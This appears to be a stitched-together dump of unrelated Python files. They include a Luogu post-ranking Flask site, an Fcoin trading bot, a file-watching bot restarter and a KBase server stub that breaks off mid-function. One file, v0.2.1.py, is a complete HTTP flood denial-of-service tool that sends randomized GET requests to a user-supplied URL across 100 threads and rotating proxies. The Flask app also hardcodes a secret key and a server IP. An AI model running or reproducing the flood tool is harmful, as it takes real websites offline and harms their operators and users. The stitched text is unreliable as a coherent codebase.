cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
app.py
|
from flask_sqlalchemy import SQLAlchemy
from flask import Flask, render_template, redirect, url_for, flash, request, jsonify, abort
import threading
from sqlalchemy import extract,func,desc
import datetime
import random
import markdown
import re
import time
import requests
import flask_bootstrap
import gunicorn
import gevent
from os import environ, path
from dotenv import load_dotenv
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, '.env'))
app = Flask(__name__)
app.secret_key = '11451419260817avdgsjrhsjaj4'
DIALECT = 'mysql'
DRIVER = 'pymysql'
USERNAME = 'root'
PASSWORD = environ.get('mysqlpassword')
HOST = '114.116.248.90'
PORT = '3306'
DATABASE = 'benben'
#app.config['SQLALCHEMY_DATABASE_URI'] = "{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALECT, DRIVER, USERNAME, PASSWORD, HOST, PORT,DATABASE)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+app.root_path+'/data.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from luogu_spider import doing,BenBen,LuoguUser
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import SubmitField, StringField,DateTimeField
from wtforms.validators import DataRequired,Length
import click
from flask_migrate import Migrate
migrate=Migrate(app,db)
bootstrap = Bootstrap(app)
thread = threading.Thread(target=doing)
thread.daemon = True
thread.start()
limiter = Limiter(app, key_func=get_remote_address)
@app.route("/", methods=['GET', 'POST'])
def main():
cur = datetime.datetime.now()
v = BenBen.query.join(BenBen.user).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).count()
b = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).group_by(BenBen.uid).order_by(desc(func.count())).limit(20)
# print(b)
    class queryform(FlaskForm):
        username = StringField(
            'Username', validators=[DataRequired(), Length(1, 20)])
        submit = SubmitField('Query')
    form = queryform()
    if form.validate_on_submit():
        user = LuoguUser.query.filter_by(username=form.username.data).first()
        if user:
            if not user.allow_paiming:
                flash("This user is banned from ranking and lookup for excessive spamming", 'danger')
                return redirect(url_for('main'))
            return redirect(url_for('user', uid=user.uid))
        else:
            flash("User does not exist or has not posted any benben while this server has been running", 'danger')
            return redirect(url_for('main'))
return render_template('zhuye.html', v=v, b=b.all(), form=form)
@app.route("/user/<int:uid>")
def user(uid):
cur = datetime.datetime.now()
u = LuoguUser.query.filter_by(uid=uid).first()
    if not u:
        flash("User does not exist or has not posted any benben while this server has been running", 'danger')
        return redirect(url_for('main'))
    if not u.allow_paiming:
        flash("This user is banned from ranking and lookup for excessive spamming", 'danger')
        return redirect(url_for('main'))
ph = u.beipohai
#print (u.allow_paiming)
u = u.benbens
v = BenBen.query.filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
BenBen.uid == uid
).count()
pm= BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).group_by(BenBen.uid).order_by(desc(func.count())).having(func.count()>v).count()
return render_template('main.html', benbens=u[:-101:-1], v=v, pm=pm+1, ph=ph,uid=uid)
@app.route("/help")
def help():
return render_template('help.html')
@app.route("/persecute", methods=["POST"])
@limiter.limit("8 per second")
def persecute():
uid = request.args['uid']
u = LuoguUser.query.filter_by(uid=uid).first_or_404()
u.beipohai += 1
phcs = u.beipohai
db.session.commit()
return str(phcs)
@app.route("/banned")
def banned():
users = LuoguUser.query.with_entities(
LuoguUser.uid, LuoguUser.username).filter_by(allow_paiming=False).all()
return jsonify(users)
@app.cli.command()
@click.option('--username', prompt=True, help='Username')
def fengjinyonghu(username):
    click.echo('Looking up user...')
    u = LuoguUser.query.filter_by(username=username).first()
    if not u:
        click.echo('User does not exist.')
        return
    click.echo('User found.')
    if not u.allow_paiming:
        click.echo('User is already banned.')
        return
    click.echo('Updating...')
    u.allow_paiming = False
    db.session.add(u)
    db.session.commit()
    click.echo('Done.')
@app.cli.command()
@click.option('--username', prompt=True, help='Username')
def jiefengyonghu(username):
    click.echo('Looking up user...')
    u = LuoguUser.query.filter_by(username=username).first()
    if not u:
        click.echo('User does not exist.')
        return
    click.echo('User found.')
    if u.allow_paiming:
        click.echo('User is not banned.')
        return
    click.echo('Updating...')
    u.allow_paiming = True
    db.session.add(u)
    db.session.commit()
    click.echo('Done.')
@app.cli.command()
@click.option('--count', prompt=True)
def fakebenbens(count):
    click.echo('Generating fake benbens...')
    count = int(count)
    benbenslist = ['I AK IOI', 'Luogu is awesome!', 'gu gu gu', 'bump', 'kkkAKIOI']
    userlist = LuoguUser.query.all()
    for i in range(count):
        b = random.choice(benbenslist)
        user = random.choice(userlist)
        abb = BenBen()
        abb.text = b
        abb.username = user.username
        abb.uid = user.uid
        abb.time = datetime.datetime.now()
        user.benbens.append(abb)
        db.session.add(abb)
        db.session.commit()
        click.echo("Generated one fake benben")
@app.route("/ranklist")
def ranklist():
page = request.args.get('page', 1, type=int)
persecute = request.args.get('persecute', 0, type=int)
begin = request.args.get('begin', 0, type=int)
end = request.args.get('end', 0, type=int)
_contentOnly=request.args.get('_contentOnly',0,type=int)
if persecute:
p = LuoguUser.query.with_entities(LuoguUser.username,LuoguUser.uid,LuoguUser.beipohai).filter(LuoguUser.beipohai != 0,LuoguUser.allow_paiming == True).order_by(
desc(LuoguUser.beipohai)).paginate(page, per_page=20, error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('persecute.html', pagination=p, messages=p.items)
if begin != 0 and end != 0:
begin=datetime.datetime.fromtimestamp (begin)
end=datetime.datetime.fromtimestamp (end)
p = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'),
BenBen.username, BenBen.uid).filter(BenBen.time.between(begin, end),
LuoguUser.allow_paiming == True).group_by(BenBen.uid).order_by(desc(func.count())).paginate(page,
per_page=20,
error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('ranklisttime.html', pagination=p, messages=p.items,begin=begin,end=end)
cur = datetime.datetime.now()
p = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True).group_by(BenBen.uid).order_by(desc(func.count())).paginate(page, per_page=20, error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('ranklist.html', pagination=p, messages=p.items)
@app.route("/timequery", methods=["GET", "POST"])
def timequery():
class timequeryform (FlaskForm):
        begin = DateTimeField('Start time', validators=[DataRequired()])
        end = DateTimeField('End time', validators=[DataRequired()])
        submit = SubmitField('Query')
form = timequeryform()
if form.validate_on_submit():
return redirect("/ranklist?begin={}&end={}".format(int (time.mktime(form.begin.data.timetuple())),int (time.mktime(form.end.data.timetuple()))))
return render_template("timequery.html", form=form)
class ValidationError (ValueError):
pass
class CheckPaste():
    def __init__(self):
        pass
    def __call__(self, form, field):
        t = field.data
        if not re.match('^[a-z0-9]{8}', t) or len(t) != 8:
            raise ValidationError('Not a valid Luogu pastebin ID')
        headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
        k = requests.get('https://www.luogu.com.cn/paste/{}?_contentOnly=1'.format(t), headers=headers)
        t = k.json()
        if t['code'] == 403:
            raise ValidationError('This pastebin is not public')
        if t['code'] == 404:
            raise ValidationError('This pastebin does not exist')
        cur = datetime.datetime.now()
        cjsj = t['currentData']['paste']['time']
        cjsj = datetime.datetime.fromtimestamp(cjsj)
        if (cur - cjsj).days >= 1:
            raise ValidationError('This pastebin was created too long ago')
        if t['currentData']['paste']['user']['uid'] != int(form.luoguid.data):
            raise ValidationError('You are not the creator of this pastebin')
        text = t['currentData']['paste']['data']
        if text != form.username.data:
            raise ValidationError('Pastebin content does not match')
@app.route("/testpaste", methods=['GET', 'POST'])
def test_paste ():
class queryform (FlaskForm):
        username = StringField(
            'Username', validators=[DataRequired(), Length(1, 20)])
        luoguid = StringField(
            'Luogu UID', validators=[DataRequired(), Length(1, 20)])
        paste = StringField(
            'Pastebin ID', validators=[DataRequired(), Length(1, 20), CheckPaste()])
        submit = SubmitField('Submit')
form=queryform()
if form.validate_on_submit():
return redirect('help')
return render_template("test_paste.html",form=form)
@app.route("/api/checkbenben")
def api_checkbenben():
uid=request.args.get('uid',-1,type=int)
headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
benbens = requests.get('https://www.luogu.com.cn/api/feed/list?user={}'.format(uid),headers=headers).json()
benbens=benbens['feeds']['result']
cur = datetime.datetime.now()
cnt=0
for i in benbens[::-1]:
text=markdown.markdown(i['content'])
username=i['user']['name']
stime=datetime.datetime.fromtimestamp(i['time'])
if BenBen.query.filter_by(uid=uid, time=stime).all():
continue
abb = BenBen()
abb.text = text.replace('<p>',"").replace('</p>',"")
abb.username = username
abb.uid = uid
abb.time = stime
user = LuoguUser.query.filter_by(uid=uid).first()
if user:
user.benbens.append(abb)
if user.username != username:
user.username = username
else:
user = LuoguUser(username=username, uid=uid)
db.session.add(user)
user.benbens.append(abb)
db.session.add(abb)
db.session.commit()
if stime.date() == cur.date():
cnt+=1
return str(cnt)
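# A minimal usage sketch (assumption: the standard Flask CLI with FLASK_APP
# pointing at this module) for the custom commands defined above:
#   flask fengjinyonghu --username SomeUser   # ban a user from ranking/lookup
#   flask jiefengyonghu --username SomeUser   # lift the ban
#   flask fakebenbens --count 10              # generate 10 fake benbens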
|
market_app.py
|
# !-*-coding:utf-8 -*-
# @TIME : 2018/6/11/0011 15:32
# @Author : Nogo
import math
import time
import talib
import numpy as np
import logging
from collections import defaultdict
from threading import Thread
from fcoin import Fcoin
from WSS.fcoin_client import fcoin_client
from balance import balance
import config
class market_app():
    '''
    Subscribed data: historical trades (trade) and market price (ticker).
    Order placement rule: cache the most recent trade prices, sort them, drop the
    extremes, and average the rest; if the difference between that average and
    the market price is within the diff_price setting, place an order.
    Notes:
    1. Manually clear your position before running the script. Each filled buy is
       re-listed as a sell at no less than the buy price; sell orders are only
       polled for status, nothing else is done with them.
    2. Set a sensible maximum position (limit_amount) to avoid repeatedly eating
       orders during violent order-book swings.
    3. Sell orders that stay unfilled for a long time must be closed manually.
    '''
def __init__(self):
self.client = fcoin_client()
#self.client.stream.stream_depth.subscribe(self.depth)
#self.client.stream.stream_klines.subscribe(self.candle)
self.client.stream.stream_ticker.subscribe(self.ticker)
self.client.stream.stream_marketTrades.subscribe(self.trade)
self.fcoin = Fcoin()
self.fcoin.auth(config.key, config.secret)
        self.buy_price = None  # best bid price
        self.buy_amount = None  # best bid size
        self.sell_price = None  # best ask price
        self.sell_amount = None  # best ask size
        self.ts = None  # timestamp of the last market-data update
        self.market_price = None  # latest market price
self.market_trade_list = None
self.total_bids = 0
self.total_asks = 0
self.filled_buy_order_list = []
self.order_list = defaultdict(lambda: None)
self.buy_order_id = None
self.dic_balance = defaultdict(lambda: None)
self.time_order = time.time()
self.price_list = []
self.candle_list = []
self.SMA = None
self._init_log()
    # logging setup
    def _init_log(self):
        self._log = logging.getLogger(__name__)
        self._log.setLevel(level=logging.INFO)
        formatter = logging.Formatter('%(asctime)s - %(message)s')  # log format
        '''
        write to a log file
        '''
        handler = logging.FileHandler("app.log")
        handler.setLevel(logging.INFO)
        handler.setFormatter(formatter)
        self._log.addHandler(handler)
        '''
        also echo to the console
        '''
        console = logging.StreamHandler()
        console.setLevel(logging.INFO)
        console.setFormatter(formatter)
        self._log.addHandler(console)
    # precision control: truncate the extra digits outright, no rounding
def digits(self, num, digit):
site = pow(10, digit)
tmp = num * site
tmp = math.floor(tmp) / site
return tmp
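    # e.g. digits(1.23456, 2) -> 1.23; digits(0.0199, 2) -> 0.01 (truncated, not rounded)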
    # WSS depth subscription callback
    def depth(self, data):
        bids = data['bids']
        asks = data['asks']
        self.ts = time.time()
        self.buy_price = bids[0]  # best bid price
        self.buy_amount = bids[1]  # best bid size
        self.sell_price = asks[0]  # best ask price
        self.sell_amount = asks[1]  # best ask size
        # bids/asks are flat [price, amount, price, amount, ...] lists; sum the
        # sizes of the top three levels, which sit at the odd indices (2*i + 1)
        for i in range(3):
            self.total_bids += bids[2 * i + 1]
            self.total_asks += asks[2 * i + 1]
    # WSS candlestick (K-line) subscription callback
def candle(self, data):
if len(self.candle_list) == 0:
self.candle_list = [{'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']}]
else:
last_candle = self.candle_list[-1]
if last_candle['timestamp'] == data['id']:
self.candle_list[-1] = {'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']}
else:
self.candle_list.append({'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']})
if len(self.candle_list) > 10:
self.candle_list.pop(0)
if len(self.candle_list) > 7:
close_array = np.array([item['close'] for item in self.candle_list])
self.SMA = talib.SMA(close_array, timeperiod=7)
    # market price (ticker) callback
def ticker(self, data):
self.ts = time.time()
self.market_price = data['ticker'][0]
def trade(self, data):
self.ts = time.time()
price = float(data['price'])
if self.market_trade_list:
self.market_trade_list.append(price)
else:
self.market_trade_list = [price]
if len(self.market_trade_list) > 100:
self.market_trade_list.pop(0)
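    # For reference, the order-gating used in process() below boils down to this
    # standalone check (assumption: 100 cached prices, 10 trimmed per tail):
    #   core = sorted(prices)[10:-10]
    #   avg = sum(core) / len(core)
    #   place_order = abs(avg - market_price) <= config.diff_price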
    # main trading loop body
    def process(self):
        if self.market_trade_list and len(self.market_trade_list) < 100:
            self._log.info('warming up: trades cached [%s]' % (len(self.market_trade_list)))
return
if self.ts and time.time() - self.ts < 10 and self.market_price:
price = self.market_price if config.fix_price == 0 else config.fix_price
amount = 0
        '''
        place sell orders for filled buy orders
        '''
success_item_list = []
for item in self.filled_buy_order_list:
amount = self.digits(item['amount'], config.symbol['amount_precision'])
price = self.digits(max(item['price'], price), config.symbol['price_precision'])
order = [amount, price]
if amount >= config.symbol['min_amount']:
                success, data = self.fcoin.sell(config.symbol['name'], price, amount)  # place the sell order
if success:
success_item_list.append(item)
self.order_list[data['data']] = order
                    self._log.info('sell order placed [%s:%s]' % (amount, price))
        '''
        drop the buys whose sell orders were placed successfully
        '''
for item in success_item_list:
self.filled_buy_order_list.remove(item)
keys = []
for key in self.order_list.keys():
success, data = self.fcoin.get_order(key)
if success:
state = data['data']['state']
if state == 'filled':
keys.append([0, key])
elif state in ('partial_canceled', 'canceled'):
keys.append([1, key])
for tag, key in keys:
self.order_list.pop(key)
if tag == 0:
                self._log.info('order filled: ' + key)
            else:
                self._log.info('order canceled: ' + key)
        '''
        when no buy order is outstanding
        '''
if not self.buy_order_id:
            '''
            refresh account balances
            '''
            self.dic_balance = self.get_balance()
            '''
            stop buying once the coin position reaches the configured cap
            '''
            coin = self.dic_balance[config.symbol['coin']]
            if coin and coin.balance > config.limit_amount:
                self._log.info('%s balance reached the cap [%s]' % (config.symbol['coin'], coin.balance))
                return
            '''
            place a buy order
            '''
usdt = self.dic_balance['usdt']
if usdt:
tmp_list = self.market_trade_list.copy()
tmp_list.sort()
avg = sum(tmp_list[10:-10])/(len(tmp_list)-20)
diff = abs(avg - self.market_price)
if config.diff_price < diff:
                    self._log.info('price deviation too large [%-0.2f]' % diff)
return
price = self.market_price if config.fix_price == 0 else config.fix_price
if usdt.available > price * config.max_amount:
amount = config.max_amount if self.total_bids > config.total_amount and self.total_asks > config.total_amount else config.min_amount
else:
amount = usdt.available / price
amount = self.digits(amount, config.symbol['amount_precision'])
if amount >= config.symbol['min_amount']:
price = self.digits(price, config.symbol['price_precision'])
                    success, data = self.fcoin.buy(config.symbol['name'], price, amount)  # place the buy order
if success:
self.time_order = time.time()
self.buy_order_id = data['data']
                        self._log.info('buy order placed [%s:%s]' % (amount, price))
                else:
                    self._log.info('insufficient usdt [%s]' % (usdt.available))
            else:
                self._log.info('failed to query balances')
else:
            '''
            a buy order is outstanding: poll its status
            '''
success, data = self.fcoin.get_order(self.buy_order_id)
if success:
state = data['data']['state']
amount = float(data['data']['filled_amount']) - float(data['data']['fill_fees'])
price = float(data['data']['price'])
if amount > 0 and state in ('filled', 'partial_canceled'):
self.filled_buy_order_list.append({'price': price, 'amount': amount})
if state == 'filled':
self.buy_order_id = None
                    self._log.info('buy order filled')
                elif state == 'canceled' or state == 'partial_canceled':
                    self.buy_order_id = None
                    self._log.info('buy order canceled')
                elif state not in ('pending_cancel',):
                    '''
                    timeout check
                    '''
                    if time.time() - self.time_order >= config.delay:
                        self.fcoin.cancel_order(self.buy_order_id)
                        self._log.info('canceled after %s second timeout' % config.delay)
else:
                self._log.info('waiting for WebSocket data...')
    # main loop
    def loop(self):
        if config.max_amount < config.symbol['min_amount'] or config.min_amount < config.symbol['min_amount']:
            self._log.info('max_amount and min_amount must be >= the exchange minimum [%s]' % (config.symbol['min_amount']))
return
self.client.start()
while not self.client.isConnected:
            self._log.info('waiting...')
time.sleep(1)
#self.client.subscribe_depth(config.symbol['name'], 'L20')
#self.client.subscribe_candle(config.symbol['name'], 'M1')
self.client.subscribe_ticker(config.symbol['name'])
self.client.subscribe_trade(config.symbol['name'])
while True:
try:
self.process()
            except Exception as error:
                self._log.info('unexpected error: %s' % error)
time.sleep(1)
    # fetch account balances
def get_balance(self):
dic_balance = defaultdict(lambda: None)
success, data = self.fcoin.get_balance()
if success:
for item in data['data']:
dic_balance[item['currency']] = balance(float(item['available']), float(item['frozen']),
float(item['balance']))
return dic_balance
    # fetch orders
def get_orders(self, symbol, states, limit=1):
'''
:param symbol:
:param states: submitted/partial_filled/partial_canceled/canceled/pending_cancel/filled
:return:
'''
success, data = self.fcoin.list_orders(symbol=symbol, states=states, limit=limit)
if success:
return data['data']
else:
print(data)
return None
if __name__ == '__main__':
run = market_app()
thread = Thread(target=run.loop)
thread.start()
thread.join()
print('done')
|
doms_runner.py
|
from subprocess import Popen, PIPE, TimeoutExpired
import threading
import sys
import time
import atexit
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
import datetime
import psutil
import os
SUBPROCESS_COMMAND = 'python runner.py'
SUBPROCESS_CWD = os.path.realpath(os.path.dirname(__file__))
child_process = None
def start_rl_bot():
global child_process
global read_out
global read_err
if child_process:
kill_proc_tree(child_process.pid)
child_process = Popen(
SUBPROCESS_COMMAND,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
shell=True,
cwd=SUBPROCESS_CWD,
)
atexit.register(lambda: child_process.kill()) # behave like a daemon
read_out = threading.Thread(target=print_file, args=[child_process.stdout], daemon=True)
read_out.start()
read_err = threading.Thread(target=print_file, args=[child_process.stderr], daemon=True)
read_err.start()
def kill_quietly(process):
    try:
        process.kill()
    except psutil.NoSuchProcess:
        return
def kill_proc_tree(pid):
    parent = psutil.Process(pid)
    children = parent.children(recursive=True)
    # kill the parent first so it cannot spawn replacements, then the children
    kill_quietly(parent)
    for child in children:
        kill_quietly(child)
    gone, still_alive = psutil.wait_procs(children, timeout=5)
def print_file(f):
for line in f:
line = line.decode('utf-8')
if line.strip() == 'Process Process-1:':
continue
print(line.rstrip())
sys.stdout.flush()
class MyEventHandler(LoggingEventHandler):
    def __init__(self):
        super().__init__()
        self.last_modified = datetime.datetime.now()
def on_modified(self, event):
if event.src_path.startswith('.\\.git'): return
if '\\__pycache__' in event.src_path: return
if event.src_path.startswith('.\\bot_code\\training'): return
now = datetime.datetime.now()
if now - self.last_modified < datetime.timedelta(seconds=0.5):
return
self.last_modified = now
global child_process
print("File modified:", event.src_path.lstrip('.\\/'))
print()
sys.stdout.flush()
start_rl_bot()
def on_created(self, event):
pass
def on_deleted(self, event):
pass
def on_moved(self, event):
pass
if __name__ == "__main__":
start_rl_bot()
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = MyEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(.1)
except KeyboardInterrupt:
observer.stop()
observer.join()
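# Usage sketch: python doms_runner.py [watch_path]
# Watches the tree (default: current directory) and restarts `python runner.py`
# whenever a relevant source file changes, debounced to one restart per 0.5 s.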
|
v0.2.1.py
|
#!/usr/bin/env python
#version: 0.2
import threading
import random
import logging
import socket
import socks
import time
import sys
import ssl
logging.basicConfig(
format="[%(asctime)s] %(message)s",
    datefmt="%H:%M:%S"  # hours:minutes:seconds
)
logger = logging.getLogger(__name__)
if "debug" in sys.argv or "d" in sys.argv:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
proxy_types = ["http", "socks4", "socks5"]
while True:
try:
proxy_list = open(input("Proxy List: "), "r")
proxies = proxy_list.readlines()
proxy_list.close()
break
except KeyboardInterrupt:
sys.exit()
except FileNotFoundError:
logger.info(f"Proxy list file not found. Try again!")
pass
except Exception as e:
logger.info(f"Unable to open/read proxy list file: {e}")
pass
while True:
try:
proxy_type = input("Proxy Type: ")
        if proxy_type not in proxy_types:
raise ValueError("Invalid proxy type")
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"Proxy Type Error: {e}")
pass
#Set as global variables for faster data processing
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = list(chars)
context = ssl.create_default_context()
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"msnbot-131-253-46-102.search.msn.com",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
active_threads = 0
max_threads = 100
sockets = 0
min_sockets = 30
hrs = 0
def urlsplit(url):
try:
url = url.strip()
try:
protocol, host = url.split("://", 1)
host = host.strip()
if len(host) == 0:
raise Exception("Missing URL host")
except ValueError:
raise Exception("Missing URL protocol")
try:
host, path = host.split("/", 1)
except ValueError:
path = ""
try:
host, port = host.split(":", 1)
except ValueError:
port = 80
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = ""
path = f"/{path}"
try:
port = int(port)
except ValueError:
raise Exception("Invalid URL port value")
url_dict = {
"protocol": protocol,
"host": host,
"port": port,
"path": path,
"parameters": parameters
}
return url_dict
    except Exception:
        raise
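# e.g. urlsplit("http://example.com:8080/a/b?x=1") ->
#   {"protocol": "http", "host": "example.com", "port": 8080,
#    "path": "/a/b", "parameters": "x=1"}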
def hflood(url, **kwargs):
try:
global active_threads
global sockets
global hrs
active_threads += 1
logger.debug(f"Thread {active_threads} started")
kwargs.setdefault("timeout", 10)
kwargs.setdefault("proxy", None)
kwargs.setdefault("delay", 1)
use_proxy = False
socket_connected = False
timeout = int(kwargs["timeout"])
delay = int(kwargs["delay"])
proxy = kwargs["proxy"]
        if proxy:
            use_proxy = True
            proxy = urlsplit(proxy)
url = urlsplit(url)
protocol = url["protocol"]
host = url["host"]
port = url["port"]
path = url["path"]
parameters = url["parameters"]
socket.setdefaulttimeout(timeout)
if use_proxy:
proxy_type = getattr(socks, proxy["protocol"].upper())
proxy_host = proxy["host"]
proxy_port = proxy["port"]
if protocol == "https":
port = 443
port = int(port)
proxy_port = int(proxy_port)
if protocol == "https":
if use_proxy:
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock = context.wrap_socket(sock, server_hostname=host)
else:
if use_proxy:
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
logger.debug(f"Socket connected: {sockets}")
socket_connected = True
sockets += 1
while True:
anti_cache = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}&{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\n\r\n"
while True:
if sockets >= min_sockets:
break
sent = sock.send(http.encode())
logger.debug(f"Sent {sent} bytes")
hrs += 1
time.sleep(delay)
except Exception as e:
logger.debug(f"hflood error: {e}")
pass
finally:
active_threads -= 1
if socket_connected:
sockets -= 1
def info():
global hrs
while True:
print(f"Threads: {active_threads} HR/s: {hrs} Sockets: {sockets}")
hrs = 0
time.sleep(1)
while True:
try:
url = input("URL: ")
urlsplit(url)
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"url error: {e}")
pass
threading.Thread(target=info, daemon=True).start()
try:
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy = f"{proxy_type}://{proxy}"
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=hflood, args=[url], kwargs={"proxy": proxy}, daemon=True).start()
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"Main Error: {e}")
pass
|
kb_functional_enrichment_1Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_functional_enrichment_1.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_functional_enrichment_1'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_functional_enrichment_1.kb_functional_enrichment_1Impl import kb_functional_enrichment_1 # noqa @IgnorePep8
impl_kb_functional_enrichment_1 = kb_functional_enrichment_1(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
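# e.g. json.dumps({"genes": {"g1", "g2"}}, cls=JSONObjectEncoder) serializes the
# set as a JSON list (element order is not guaranteed).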
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
